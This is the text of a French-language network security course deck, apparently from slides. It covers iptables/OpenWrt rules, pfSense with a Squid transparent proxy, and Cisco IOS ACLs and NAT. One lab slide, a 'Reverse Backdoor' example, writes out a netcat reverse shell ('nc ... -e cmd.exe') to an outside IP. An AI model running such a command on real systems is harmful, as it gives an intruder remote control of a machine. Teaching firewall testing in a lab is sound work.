Comment crer une configuration sous
forme de script ?
Quelle serait la configuration plus fine ?
9. Examen avanc du
pare-feu Netfilter
9. Examen avanc
Observation des rgles de LuCI Firewall
Filtrage IPv6
Cration dune DMZ
Epreuve nc/nmap
Rgles LuCI NAT Masquerade
iptables -S -t nat
-P PREROUTING ACCEPT
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-P POSTROUTING ACCEPT
-A POSTROUTING -o eth1 -j zone_wan_nat
-A zone_wan_nat -j MASQUERADE
Rgles LuCI firewall (1/3)
iptables -S -t filter
-P INPUT ACCEPT
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j syn_flood
-A INPUT -j input_rule
-A INPUT -j input
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -j forwarding_rule
-A FORWARD -j forward
-A FORWARD -j reject
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -j output_rule
-A OUTPUT -j output
-A forward -i br-lan -j zone_lan_forward
-A forward -i eth1 -j zone_wan_forward
-A input -i br-lan -j zone_lan
-A input -i eth1 -j zone_wan
-A output -j zone_lan_ACCEPT
-A output -j zone_wan_ACCEPT
-A reject -p tcp -j REJECT --reject-with tcp-reset
-A reject -j REJECT --reject-with icmp-port-unreachable
-A syn_flood -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN
-m limit --limit 25/sec --limit-burst 50 -j RETURN
-A syn_flood -j DROP
-A zone_lan -j input_lan
-A zone_lan -j zone_lan_ACCEPT
-A zone_lan_ACCEPT -o br-lan -j ACCEPT
-A zone_lan_ACCEPT -i br-lan -j ACCEPT
-A zone_lan_DROP -o br-lan -j DROP
-A zone_lan_DROP -i br-lan -j DROP
-A zone_lan_REJECT -o br-lan -j reject
-A zone_lan_REJECT -i br-lan -j reject
-A zone_lan_forward -j zone_wan_ACCEPT
-A zone_lan_forward -j forwarding_lan
-A zone_lan_forward -j zone_lan_REJECT
-A zone_wan -p udp -m udp --dport 68 -j ACCEPT
-A zone_wan -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A zone_wan -j input_wan
-A zone_wan -j zone_wan_REJECT
-A zone_wan_ACCEPT -o eth1 -j ACCEPT
-A zone_wan_ACCEPT -i eth1 -j ACCEPT
-A zone_wan_DROP -o eth1 -j DROP
-A zone_wan_DROP -i eth1 -j DROP
-A zone_wan_REJECT -o eth1 -j reject
-A zone_wan_REJECT -i eth1 -j reject
-A zone_wan_forward -j forwarding_wan
-A zone_wan_forward -j zone_wan_REJECT
Exercice : Configuration stricte
1. Autoriser le trafic Loopback
2. Bloquer le trafic des rseaux Bogon
3. Bloquer le trafic venant de rseaux privs (RFC1918)
sur lInternet
4. Autoriser finement le trafic de gestion (SSH, HTTP) et
de contrle (NTP, DHCP, DNS) du pare-feu
5. Fonction anti-SynFlood
6. Limiter les ICMP echos request externes
7. Nautoriser en sortie que le trafic HTTP et HTTPS avec
filtrage SPI.
8. Activer le DNS Forwarder et le service NTP.
Filtrage IPv6
http://wiki.openwrt.org/doc/uci/network6
http://wiki.openwrt.org/doc/howto/ipv6
#!/bin/sh
opkg update
opkg install kmod-ipv6
opkg install kmod-ip6tables
opkg install ip6tables
Exemples avancs
Usage avanc : http://www.linuxhomenetworking.com/wiki/index.
php/Quick_HOWTO_:_Ch14_:
_Linux_Firewalls_Using_iptables#Advanced_iptables_Initialization
Port Forwarding : http://www.linuxhomenetworking.com/wiki/index.
php/Quick_HOWTO_:_Ch14_:
_Linux_Firewalls_Using_iptables#Port_Forwarding_Type_NAT_.
28DHCP_DSL.29
Redirection :
http://www.netfilter.org/documentation/HOWTO/fr/NAT-HOWTO-6.html#ss6.2
Logs :
http://olivieraj.free.fr/fr/linux/information/firewall/fw-03-09.html
Sous Openwrt : logread | firewall
Ajout dune DMZ (1/2)
Ajout dune DMZ (2/2)
Rfrences
Pare-feu_(informatique), Firewall_(computing), Zone_dmilitarise_(informatique)
http://en.wikipedia.org/wiki/Cyber_security_and_countermeasure
http://fr.wikipedia.org/wiki/Pare-feu_%C3%A0_%C3%A9tats
http://en.wikipedia.org/wiki/Stateful_firewall
http://en.wikipedia.org/wiki/Application_layer_firewall
http://en.wikipedia.org/wiki/Proxy_server
http://fr.wikipedia.org/wiki/Proxy
http://en.wikipedia.org/wiki/Reverse_proxy
http://en.wikipedia.org/wiki/Content-control_software
http://en.wikipedia.org/wiki/Category:Web_caching_protocol
http://commons.wikimedia.org/wiki/File:Netfilter_schema.png
Quick_HOWTO_:_Ch14_:_Linux_Firewalls_Using_iptables
http://olivieraj.free.fr/fr/linux/information/firewall/index.html
http://wiki.openwrt.org/doc/howto/netfilter
http://wiki.openwrt.org/doc/uci/firewall
http://man.cx/iptables
http://man.cx/ip6tables
http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/SAFE_RG/safesmallentnetworks.html
Zone-Based Policy Firewall Design and Application Guide
Zone-Based Policy Firewall IPv6 Support
http://www.sans.org/score/checklists/FirewallChecklist.pdf
Ajout dune station pirate
A laide des logiciels Netcat et NMAP, veuillez
prouver le pare-feu et son architecture en
suivant le document :
http://fr.scribd.com/doc/201674667/ICND1-
0x02-Labs-TCP
Scnarios de test : Topologie client
Scnarios sur le lab : Topologie
client/server
Exemple : Reverse Backdoor
Pour excuter une attaque Backdoor :
Sur la machine joindre
nc l p 3333
Sur la machine distante
nc 8.9.10.11 3333 -e cmd.exe
Outils daudit
Couche/protocole commandes
Application DNS : nslookup, dig
Transport (TCP/UDP) netcat, nmap, hping3
IPv6, ICMPv6/ND thc-ipv6
IPv4, ICMP ping, ifconfig/ipconfig, netstat -r/route
print, traceroute
Ethernet/ARP arp
arping
arp-scan
macchanger
arpspoof
III. Pratique pfSense
Sommaire Pratique pfSense
12. Observation et configuration du pare-feu
13. Configuration Proxy Transparent
14. NAT : DMZ ou Reverse Proxy
Topologie de base
Fonctionnalits
NAT/PAT, SNAT/DNAT
Topologie dtude, topologie physique,
topologie logique
Composants personnels, quipes
Paramtres rseau et des VMs
Installation du pare-feu pfsense
Fonctionnalits
routage et de NAT.
Il peut intgrer des fonctionnalits
VPN/IPS/Firewall/proxy intgres ou spares.
On peut ajouter la topologies des moniteurs
IDS/IPS, des appliances NAC, une gestion
intgres des accs, des pare-feu et anti-X
locaux.
NAT/PAT
La fonctionnalit NAT/PAT vise r-crire les en-ttes
de couche 3 et couche 4.
Il rompt la connectivit TCP/IP.
Il est indispensable pour connecter un rseau global
un rseau IPv4 priv.
Il na pour objectif que dassurer des migrations d
adressage IPv4, notamment en rduisant le manque d
adresses IPv4.
Il ne constitue en rien un technique de scurit, de
filtrage ou de contrle. Il rend le rseau IPv4 un peu
plus opaque.
Il est souvent excut ct des processus de filtrage
puisquil sagit de rcriture de paquets.
SNAT/DNAT
Le SNAT vise rcrire les adresses/ports source.
Le DNAT vise rcrire les adresses/ports source.
On peut jouer sur les numros de ports source et
destination.
Les ports connus :
TCP80 HTTP,
TCP443 HTTPS,
TCP25 SMTP,
UDP53 DNS,
UDP123 NTP,
TCP22 SSH,
TCP21 FTP
...
Topologie dtude
Topologie physique
Rseau VMWare
128Mo 1Go
128Mo 1Go
1Go 2Go
Station Windows ou autre sur un LAN virtuel, station de
contrle du pare-feu en HTTPS et en SSH
Pare-feu Pfsense
Des attaquants potentiels, les stations hardware du
rseau physique.
Topologie BSD/pfSense
Paramtres rseau
Apprenant X
Equipe Y
Zone Vmware Br Mode BSD
Intf
Adresse
WAN VMNET0 Bridged em0 DHCP
LAN VMNET1 Host-Only em1 192.168.1XY.*/24
DMZ VMNET2 Host-Only em2 192.168.XY.*/24
Paramtres des VMs
Une VM Windows 7 prte avec Firefox.
Une VM pfsense 2.1 64 bits (512 Mo RAM) :
iso tlcharger
Une interface de gestion par dfaut
192.168.1.1/24
Mot de passe pfSense : admin/pfsense
Procdure dinstallation du pare-feu
pfSense
1. Lancer la VM avec lISO du Live-CD
2. Trois interfaces.
3. Option I au dmarrage
4. vlan : n
5. wan : em0
6. lan : em1
7. redmarrez
8. Allez sur https://192.168.1.1/ partir de la
VM du LAN
Configuration gnrale
Configuration gnrale : System/Setup Wizard
Hostname : pfSense-XY > Next
Timezone : Europe/Brussels > Next
Block RFC1918 Private Networks : non-coch
Block bogon networks : non-coch > Next
LAN IP Address : 192.168.1XY.1/24 > Next
Password : > Next > Reload
Documentation dinstallation
pfSense
https://doc.pfsense.org/index.
php/Installing_pfSense_in_vmware_under_windows
php/PfSense_ISO_installation_step-by-step
https://doc.pfsense.org/smiller/Install_Guide.htm
php/PfSense_2_on_VMware_ESXi_5
12. Observation et
configuration du pare-feu
Pfsense
pfSense est un routeur / pare-feu open source bas sur
FreeBSD. pfSense peut tre install sur un simple
ordinateur personnel comme sur un serveur. Bas sur PF
(packet filter), comme iptables sur GNU/Linux, il est rput
pour sa fiabilit. Aprs une installation en mode console, il
s'administre ensuite simplement depuis une interface web
et gre nativement les VLAN (802.1q).
Un support commercial est disponible ainsi quune offre d
appliances Hardware ou virtuelles.
Observation et configuration du
pare-feu
Observation de la configuration par dfaut
oprationnelle.
Configuration avance
Firewall: Rules LAN
Firewall Rules WAN
Firewall Rules NAT (auto)
Firewall Rules NAT (manual)
Configuration des logs
Exercice 1 : Configuration stricte
1. Autoriser le trafic Loopback
2. Bloquer le trafic venant des rseaux Bogon
3. Bloquer le trafic venant de rseaux privs (RFC1918)
sur lInternet
4. Autoriser finement le trafic de gestion (SSH, HTTP) et
de contrle (NTP, DHCP, DNS) du pare-feu
5. Fonction anti-SynFlood
6. Limiter les ICMP echos request externes
7. Nautoriser en sortie que le trafic HTTP et HTTPS avec
filtrage SPI.
8. Activer le DNS Forwarder et le service NTP.
Rseaux bogon
En IPv4 source destination de linterface WAN du pare-
feu, les rseaux bogon bloquer :
Classe D : Multicast 224.0.0.0/4
Classe E : Rserv 240.0.0.0/5
Adresse de loopback 127.0.0.0/8
Premier rseau : 0.0.0.0/8
Adresse de Broadcast 255.255.255.255/32
Adresses APIPA 169.254.0.0/16
Adresses prives : 10.0.0.0/8, 172.16.0.0/12,
192.168.0.0/24
$EXTERNAL_IP
Firewall: Rules WAN
Firewall: Rules LAN
Status: System logs: Firewall
13. Configuration Proxy
Transparent
Rappel : Serveur Proxy (1/2)
La fonctionnalit serveur Proxy (mandataire) consiste lui
confier du trafic qui le traverse, avec le support dHTTP,
HTTPS, FTP, voire tout protocole TCP/UDP.
Cette fonctionnalit rompt la connectivit TCP/IP mais
permet un contrle fin du trafic des utilisateurs.
A des fins de performance : cache, compression, de filtrage de publicit ou
de contenus lourds
A des fins de journalisation
En supportant AAA pour contrler le trafic des utilisateurs internes
(authentification, autorisation, comptabilisation)
En assurant la confidentialit des communications (chiffrement)
En filtrant sur base des URLs, voire du contenu
En reprenant des fonctionnalits de pare-feu
Rappel : Serveur Proxy (2/2)
Un serveur proxy est un logiciel local ( des fins de mise en
tunnel), excut sur un serveur distant ou sur le pare-feu
lui-mme.
Il peut ncessiter une intervention sur les machines clientes
ou tre totalement transparent.
Un serveur proxy remplace les paramtres TCP/IP de l
metteur et le rend plus transparent sur le rseau. Dune
certaine manire il peut renforcer lanonymat.
Un Forwarding proxy prend en charge les
requtes venant dun rseau interne et les
transfre vers lInternet.
Un proxy ouvert prend en charge les
requtes venant de nimporte quel rseau
et les transfre vers lInternet.
Procdure Proxy Transparent
Installation du logiciel Squid3-dev
Configuration gnrale
Dsactivation du transfert du trafic sortant et
du NAT sur le LAN
Gnration dun certificat (CA autosign)
Filtrage SSL
Exercices complmentaires
Installation des paquets Squid
Dans System>Packages, veuillez installer
squid3-dev et LightSquid.
Vous pourrez par aprs tester SquidGuard-
squid3, ou/et Dansguardian.
Proxy server: General Settings (1/3)
Dans Services>Proxy Server :
Onglet General Settings
Cliquez sur Save en bas de la page
Redmarrez le service
Firewall: Rules LAN
Il devient inutile dautoriser du trafic sortant. En
effet, seul le Proxy sort du trafic HTTP.
Firewall: NAT: Outbound
Plus besoin du NAT pour le LAN !
LightSquid Reports
Dans Services>Proxy Reports :
Cacher le trafic HTTPS
Squid3 nest pas encore configur pour cacher le trafic
HTTPS. Le serveur Proxy va proposer son certificat (
gnrer en premier lieu).
Sil nest pas install dans le magasin de certificats des
machines clientes (CA autosigne) ou sil nest pas
sign par une CA valide, cela na pas beaucoup d
intrts.
On peut toutefois tester la fonctionnalit en ignorant les
avertissements des navigateurs, quand cest possible.
System: Certificate Authorithy
Manager
System: Certificate Authorithy
Manager
Vrification
Proxy server: General Settings : SSL
Cliquez sur Save en bas de la page
Redmarrez le service
Exercices complmentaires
1. Mise en place de SquidGuard
2. Mise en place de DansGuardian
3. Authentification Radius et une base de
donne (MySQL, LDAP/MS-AD, ),
configuration NTLM
Pour aller plus loin sur les proxys
3 Implementations of
proxies
3.1 Web proxy servers
3.2 SOCKS proxy
3.3 Transparent proxy
3.3.1 Purpose
3.3.2 Issues
3.3.3 Implementation
methods
3.3.4 Detection
3.4 CGI proxy
3.5 Anonymous HTTPS
proxy
3.6 Suffix proxy
3.7 Tor onion proxy
software
3.8 I2P anonymous
proxy
3.9 Proxy vs. NAT
3.10 DNS proxy
Rfrences Squid/pfSense
php/Setup_Squid_as_a_Transparent_Proxy
https://doc.pfsense.org/index.php/SquidGuard
https://doc.pfsense.org/index.php/Category:Squid
Filtering HTTPS / SSL Traffic on pfSense 2.1 using
Squid Proxy
php/HAVP_Package_for_HTTP_Anti-Virus_Scanning
https://forum.pfsense.org/index.php?topic=42664.0
(DansGuardian)
http://thegeekninja.wordpress.com/2013/07/02/pfsense-
squid3-and-dansguardian-a-better-alternative-to-
squidguard/
14. DMZ : NAT ou Reverse
Proxy
Reverse-Proxy
Un Reverse proxy apparat comme tant le
serveur destinataire final. Il prend en charge les
requtes venant de lInternet et les transfre
un rseau interne.
En ce sens un Reverse-Proxy peut cacher les
caractristiques du serveur qui est demand. Il
peut prendre en charge des fonctionnalits de
filtrage de haut-niveau applicatif.
Fonctionnalits Reverse-Proxy
WAF : Fonctionnalits Applications Firewall
contre des attaques Web et les Worms
SSL Acceleration : Prise en charge du
chiffrement SSL la place du fournisseur de
contenu
Load Balancing : Rpartiteur de trafic (Web)
Mise en cache et/ou compression de
contenu statique ou dynamique, Web
Acceleration
Rcriture dURL, migration de sites WEB
Activit
1. Installation dune DMZ avec un serveur WEB
a. Ajout dune interface et dun serveur
b. Rgles Firewall
c. Rgle DNAT
d. et/ou Reverse Proxy
Rfrences
https://www.google.be/search?
q=reverse+proxy+pfsense
http://www.ophyde.com/reverse-proxy-avec-pfsense/
http://www.ophyde.com/reverse-proxy-https-avec-
pfsense/
http://blogs.technet.
com/b/nexthop/archive/2014/04/07/configuring-pfsense-
as-a-reverse-proxy-for-lync-web-services.aspx
q=apache2+reverse+proxy+howto+debian
q=nginx+reverse+proxy+howto+debian
IV. Pratique Cisco IOS
Sommaire Pratique Cisco IOS
15. Topologie Cisco
16. ACLs Cisco IOS
17. Cisco ZBF
15. Topologie Cisco
Fonctionnalits de la topologie
routage et de NAT.
Packet Tracer (PT) ne supporte pas cette
topologie.
On peut par contre utiliser :
du vrai matriel
GNS3/Virtualbox
CSR1000v/VMWare
Configuration de la topologie
Le pare-feu est virtualis (GNS3)
Le LAN est aussi virtualis avec Virtualbox par
exemple. On y trouve une station avec un OS graphique
: 192.168.1XY.0/24
Le WAN se connecte au rseau local de la machine
physique et obtient ses paramtres IP dynamiquement
(configuration GNS3 Bridging).
La DMZ est aussi virtualise de la mme manire.
La faible emprunte sur votre PC de lab dpend des OS
utiliss. LOpen Source peut vous aider.
Topologie dtude
Topologie Cisco
Stations agnostiques
Console directe sur l
IOS
Routeur Cisco IOS :
C3725
ADVENTERPRISEK9-M
Version 12.4(15)T14
Des attaquants
potentiels, les stations
hardware du rseau
physique.
Paramtres rseau
Apprenant X
Equipe Y
Lordre de cration des interfaces est
important.
Zone Descr. IOS Intf Adresse
LAN DHCP Server dbut .100/24 f0/0 192.168.1XY.1/24
WAN Bridged, NAT Sortant f0/1 10.0.0.2/24
DMZ DHCP Server dbut .160/24 f1/0 192.168.XY.1/24
Accs la console
Les routeurs/pare-feu Cisco sont fournis
avec une configuration vierge.
Veuillez vous connecter la console des
machines de la topologie
Configuration de dpart
service password-encryption
enable secret motdepasse
!
hostname R1
ip domain name entreprise.lan
ip name-server 8.8.8.8
ip domain-lookup
!
ip dns server
!
username root secret mot_de_passe
!
line vty 0 4
login local
!
crypto key generate rsa
Service DHCP (LAN et DMZ)
ip dhcp excluded-address 192.168.115.1 192.168.115.99
ip dhcp excluded-address 192.168.23.1 192.168.23.159
!
ip dhcp pool DHCP_LAN
network 192.168.115.0 255.255.255.0
default-router 192.168.115.1
dns-server 192.168.115.1
!
ip dhcp pool DHCP_DMZ
network 192.168.23.0 255.255.255.0
default-router 192.168.23.1
dns-server 192.168.23.1
Interfaces et routage IPv4
interface FastEthernet0/0
description interface zone LAN
ip address 192.168.115.1 255.255.255.0
no shutdown
!
description interface zone WAN
ip address 10.0.0.2 255.255.255.0
ip nat outside
no shutdown
!
description interface zone DMZ
ip address 192.168.23.1 255.255.255.0
ip nat inside
no shutdown
!
ip route 0.0.0.0 0.0.0.0 10.0.0.1
NAT Overload
ip nat inside source list NAT_source interface FastEthernet0/1 overload
!
ip access-list standard NAT_source
permit 192.168.115.0 0.0.0.255
permit 192.168.23.0 0.0.0.255
!
description interface zone LAN
ip nat inside
!
description interface zone WAN
ip nat outside
!
description interface zone DMZ
ip nat inside
Diagnostic
show ip interface brief
show ip route
ping cisco.goffinet.org
ping 8.8.8.8
show ip route
ping (tendu sur linterface f0/0 LAN)
traceroute (tendu sur linterface f0/0 LAN)
show ip nat translations
show ip dhcp binding
debug ip nat ...
debug ip dhcp ...
16. ACLs Cisco IOS
ACL dfinition et utilit
ACL = ensemble de rgles de filtrage du trafic
Utiles pour :
les fonctions de pare-feu
marquage du trafic
NAT
Contrler les logs, les accs consoles
virtuelles (VTY), ...
Vision Cisco IOS mais bon point de dpart en
scurit.
Deux types dACLs IPv4
Les deux types dACLs se distinguent en fonction des
critres utiliss. Une liste simple (standard) et lautre plus
complexe (tendue).
Standard : uniquement adresse IPv4 source
Etendue :
protocole IPv4, ICMPv4, TCP, UDP, ESP, AH, ...
origine et destination
port et types de messages
ACLs numrotes
Les ACLs numrotes sont constitues dun
ensemble de rgles :
ordonnes selon la frappe
ayant un mme numro
Pratique obsolte (en IPv6) dont le numro
indique la nature :
IP standard : 1 - 99 et 1300 - 1999
IP tendue : 100 - 199 et 2000 - 2699
Exemple dACLs numrotes
En configuration globale :(config)#
access-list 1 deny host 192.168.10.1
access-list 1 permit any
ou
access-list 102 deny tcp any any eq 23
access-list 102 permit ip any any
LACL standard 1 empche seulement le trafic venant de lhte 192.168.10.1
LACL extended 102 empche tout trafic vers le service Telnet et autorise tout autre trafic
IPv4.
Faut-il encore placer ces ACLs dans une fonction (filtrage, marquage, rgles NAT)
ACL nommes
Les ACLs nommes prennent un nom.
Il faut spcifier le type standard ou extended en IPv4.
Les ACLs IPv6 sont doffice extended.
les rgles sincrmentent dun numro dordre (tous les
10). Cet ID permet dinsrer des rgles dans une liste.
(config)#ip access-list standard ACL_IPv4_STD
(config-std-nacl)#permit | deny ?
(config)#exit
(config)#ip access-list extended ACL_IPv4_EXT
(config-ext-nacl)#permit | deny ?
(config)#exit
(config)#ipv6 access-list ACL_IPv6
(config-ipv6-acl)#permit | deny ?
Exemple ACLs nommes
(config)#ip access-list extended IPv4_LAN
(config-ext-nacl)#
permit tcp 192.168.0.0 0.0.255.255 any eq 80
#show access-lists
Extended IP access list IPv4_LAN
10 permit tcp 192.168.0.0 0.0.255.255 any eq www
20 permit tcp 192.168.0.0 0.0.255.255 any eq 443
Logique
Le routeur parcourt la liste daccs et valide chaque rgle jusqu trouver une
correspondance.
Si une correspondance est trouve, le routeur prend la dcision permit ou
deny correspondante.
Une ACL se termine toujours par un deny any implicite.
Masque gnrique
Il ne faut pas confondre un masque gnrique (wilcard
mask) avec un masque de sous-rseau (subnet mask).
Un masque gnrique est un masque de filtrage.
Quand un bit aura une valeur de 0 dans le masque, il y
aura vrification de ce bit sur l'adresse IP de rfrence.
Lorsque le bit aura une valeur de 1, il n'en y aura pas.
Cette notion est utilise dans les configurations
OSPFv2 sous Cisco IOS.
Masque de rseau
Un masque de rseau est un masque de division ou de
regroupement. Une addition boolenne d'une adresse
IP et d'un masque de rseau est utilise pour distinguer
la partie rseau de la partie hte.
En binaire, alors qu'un masque de rseau est
ncessairement une suite homogne de 1 et puis de 0,
un masque gnrique peut tre une suite
quelconque de 1 et de 0 en fonction du filtrage que l'on
veut oprer sur des adresses IP.
Exemples de masque gnrique (1/3)
Soit un masque gnrique 0.0.0.0 demande une
correspondance exacte de ladresse IP de rfrence :
permit 192.168.1.1 0.0.0.0
Le mot-cl host remplace 0.0.0.0
permit host 192.168.1.1
255.255.255.255 filtre toutes les adresses IPv4.
permit 0.0.0.0 255.255.255.255
Le mot-cl any remplace 0.0.0.0 255.255.255.255
permit any
Filtrer 192.168.1.0/24
192.168.1.0 255.255.255.0
ACL : 192.168.1.0 0.0.0.255
Filtrer 192.168.1.40/30
192.168.1.40 255.255.255.252
ACL : 192.168.1.40 0.0.0.3
Masque de sumarization :
Filtrer tous les rseaux qui commencent en
192.168 :
ACL : 192.168.0.0 0.0.255.255
Numros pairs sur le dernier octet du /24 :
ACL : 192.168.1.0 0.0.0.254
Numros impairs sur le troisime octet :
ACL : 0.0.1.0 255.255.254.255
Applications
En soi, une ACL na pas de porte si elle nest pas
applique.
Filtrage sans tat de trafic de donnes sur des interfaces.
Firewall (filtrage tat) sur des interfaces : ACL bloquante
Filtrage de trafic de trafic de gestion (sur une ligne VTY).
Trafic source dans une rgle NAT (inside source list) pour
dsigner de nombreuse adresses IP prives traduire.
Transfert de port
Dboggage pour filtrer les sorties.
et bien dautres en ingnrie du trafic (VPN, QoS,
filtrage du routage, routage la demande, ).
Direction des ACLs
Les liste daccs sappliquent sur les interfaces :
pour le trafic entrant sur linterface, in
pour le trafic sortant de linterface, out
#show access-lists
Extended IP access list IPv4_LAN
10 permit tcp 192.168.0.0 0.0.255.255 any eq www (5 match(es))
20 permit tcp 192.168.0.0 0.0.255.255 any eq 443
(config)#int f0/0
(config-subif)#ip access-group IPv4_LAN in
Autres types dACLs
Ce document ne couvre pas dautres types d
ACLs Cisco :
ACLs established
Reflexive ACLs
Dynamic ACLs (sorte de Port Knocking)
Time-based ACLs that use time ranges
Authentication proxy
Turbo ACLs
Distributed time-based ACLs
Exemples de mise en oeuvre
Refuser laccs dun hte un rseau
Autoriser une plage contigus dadresses IP
Autoriser laccs dun hte une interface
Refuser/autoriser du trafic SSH
Autoriser du trafic TCP 80
Pare-simple CBAC
Autoriser des Pings (ICMP)
Autoriser le Web, le mail, FTP et SSH
Autoriser le trafic DNS
Autoriser le trafic de routage
Dboggage du trafic
Filtrage VTY
Rgles implicites en IPv6
Filtrage IPv6
Refuser laccs dun hte un
rseau
Refuser PC1 daccder Server :
R1#sh ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.23.160 0800.2790.cf87 Mar 02 2002 12:00 AM Automatic
192.168.115.160 0800.2742.56ff Mar 02 2002 12:00 AM Automatic
192.168.115.161 0800.27bf.000a Mar 02 2002 12:00 AM Automatic
R1#conf t
R1(config)#ip access-list standard DENY_PC1_SERVER
R1(config-std-nacl)#deny host 192.168.23.160
R1(config-std-nacl)#exit
R1(config)#int f1/0
R1(config-if)#ip access-group DENY_PC1_SERVER out
Autoriser une plage contigus d
adresses IP
Imaginons que lon ait toute une srie de LANs
adresss en 192.168.X.X/24 derrire le pare-
feu :
R1(config)#ip access-list standard DENY_LANS
R1(config-std-nacl)#deny 192.168.0.0 0.0.255.255
Autoriser laccs dun hte une
interface
R1#sh ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.23.160 0800.2790.cf87 Mar 02 2002 12:00 AM Automatic
192.168.115.160 0800.2742.56ff Mar 02 2002 12:00 AM Automatic
192.168.115.161 0800.27bf.000a Mar 02 2002 12:00 AM Automatic
R1#conf t
R1(config)#ip access-list standard PERMIT_PC1
R1(config-std-nacl)#permit host 192.168.115.160
R1(config-std-nacl)#exit
R1(config)#int f0/0
R1(config-if)#ip access-group PERMIT_PC1 in
Test partir de PC1 et de PC2 avant et aprs lapplication de lACL
Refuser/autoriser du trafic SSH
Sur une interface : ?
Sur le service : ?
Autoriser du trafic TCP 80
R1(config)#ip access-list extended PERMIT_TCP
R1(config-ext-nacl)#10 permit udp any eq domain any
R1(config-ext-nacl)#20 permit tcp any eq www 192.168.115.0
0.0.0.255 established
R1(config-ext-nacl)#exit
R1(config)#int f0/1
R1(config-if)#ip access-group PERMIT_TCP in
Pare-feu simple CBAC
(config)#ip access-list extended IP_BLOCK
(config-ext-nacl)#permit udp any eq 53 any
(config-ext-nacl)#exit
(config)#exit
(config)#int f0/1
(config-if)#ip access-group IP_BLOCK in
#show access-list IP_BLOCK
Extended IP access list IP_BLOCK
deny ip any any (39 match(es))
(config)#ip inspect name FW udp
(config)#ip inspect name FW tcp
(config)#int f0/0
(config-subif)#ip inspect FW in
Autoriser des Pings (ICMP)
Le plus simplement du monde avec CBAC :
R1(config)#ip inspect name FW icmp
Autrement par ACL :
R1(config)#ip access-list extended PERMIT_ICMP
R1(config-ext-nacl)#permit icmp any any echo
R1(config-ext-nacl)#permit icmp any any echo-reply
Autoriser le Web, le Mail, FTP et SSH
Vers le serveur en DMZ 192.168.23.160 venant
de toutes les autres zones :
R1(config)#ip access-list extended DMZ_SERVICES
R1(config-ext-nacl)#permit tcp any any eq www
R1(config-ext-nacl)#permit tcp any any eq 22
R1(config-ext-nacl)#permit tcp any any eq smtp
R1(config-ext-nacl)#permit tcp any any eq pop3
R1(config-ext-nacl)#
R1(config-ext-nacl)#exit
R1(config)#int f1/0
R1(config-if)#ip access-group DMZ_SERVICES out
Autoriser le trafic DNS
Dur dur lInternet sans DNS
permit udp any any eq domain
permit udp any eq domain any
Autoriser des mises--jour de
routage
permit udp any any eq rip
permit eigrp any any
permit ospf any any
permit tcp any any eq 179
permit tcp any eq 179 any
Dboggage du trafic
Par exemple :
R1(config)#access-list 199 permit tcp host 192.168.115.160
host 192.168.23.60
R1(config)#access-list 199 permit tcp host 192.168.23.60
host 192.168.115.160
R1(config)#end
R1#debug ip packet 199 detail
IP packet debugging is on (detailed) for access list 199
Filtrage VTY
(config)#ip access-list extended VTY
(config-ext-nacl)#permit ip host 172.16.0.1 any
(config-ext-nacl)#permit ip 192.168.0.0 0.0.255.255 any
(config-ext-nacl)#exit
(config)#line vty 0 4
(config-line)#ip access-class VTY in
NAT
Permet de traduire :
les adresses internes (inside)
prive (local) en
publique (global)
les adresses externes (outside)
Le routeur NAT tient une table de traduction
Il transforme le trafic : il remplace les en-ttes
IP et de couche transport (UDP/TCP).
PAT
Un routeur peut prendre en compte le port TCP
ou UDP utilis.
Permet de transfrer un service TCP ou UDP
sur une adresse prive vers une adresse
publique.
Permet de multiplexer la connectivit globale d
un LAN avec une seule adresse IP publique.
Transfert de port
(config)#
ip nat inside source static tcp 192.168.10.1
3389 interface f0/1 3389
Mise en oeuvre du PAT
access-list 1 permit 192.168.0.0 0.0.255.255
ip nat inside source list 1 interface f0/1
overload
interface f0/0.1
ip nat inside
interface f0/0.2
ip nat inside
interface f0/1
ip nat outside
Vrification du NAT/PAT
Gateway#show ip nat translations
Pro Inside global Inside local Outside local Outside
global
icmp 195.238.2.21:11 192.168.1.254:11 195.238.2.22:11 195.238.2.22:
11
icmp 195.238.2.21:12 192.168.1.254:12 195.238.2.22:12 195.238.2.22:
12
icmp 195.238.2.21:13 192.168.1.254:13 195.238.2.22:13 195.238.2.22:
13
icmp 195.238.2.21:14 192.168.1.254:14 195.238.2.22:14 195.238.2.22:
14
icmp 195.238.2.21:15 192.168.1.254:15 195.238.2.22:15 195.238.2.22:
15
Gateway#
Inside Local = adressage priv
Inside Global = adressage public
Rfrences
http://www.cisco.com/c/en/us/support/docs/ip/access-
lists/26448-ACLsamples.html
http://www.cisco.com/c/en/us/td/docs/ios-
xml/ios/ipv6/configuration/15-2s/ipv6-15-2s-book/ip6-
sec-trfltr-fw.html#GUID-F9C70A05-6CC1-48F8-8DCA-
A40291E343ED
http://www.bortzmeyer.org/ipv6-securite.html
http://www.cisco.
com/en/US/prod/collateral/iosswrel/ps6537/ps6553/whit
e_paper_c11-678658.html
RFC 6092 et RFC 6204 : recommandations de ltrage
sur les CPE end-user.
17. Cisco ZBF
Zone-based policy firewall
Le modle de configuration Zone-based policy firewall
(ZPF or ZBF or ZFW) a t introduit en 2006 avec lIOS
12.4(6)T.
Avec ZPF, les interfaces sont assignes des zones
sur lesquelles une rgle dinspection du trafic
(inspection policy) est applique. Elle vrifie le trafic qui
transite entre les zones.
Une rgle par dfaut bloque tout trafic tant quune rgle
explicite ne contredit pas ce comportement.
ZPF supporte toutes fonctionnalits SPI, filtrage des
URLs et contre-mesure des DoS.
Rgles ZPF
Une zone doit tre configure (cre) avant quune interface puisse en
faire partie.
Une interface ne peut tre assigne qu une seule zone.
Tout le trafic vers ou venant dune interface donne est bloqu quand elle
est assigne une zone sauf pour le trafic entre interfaces dune mme
zone et pour le trafic du routeur lui-mme.
Une policy (policy-map), politique de scurit autorise ou inspecte
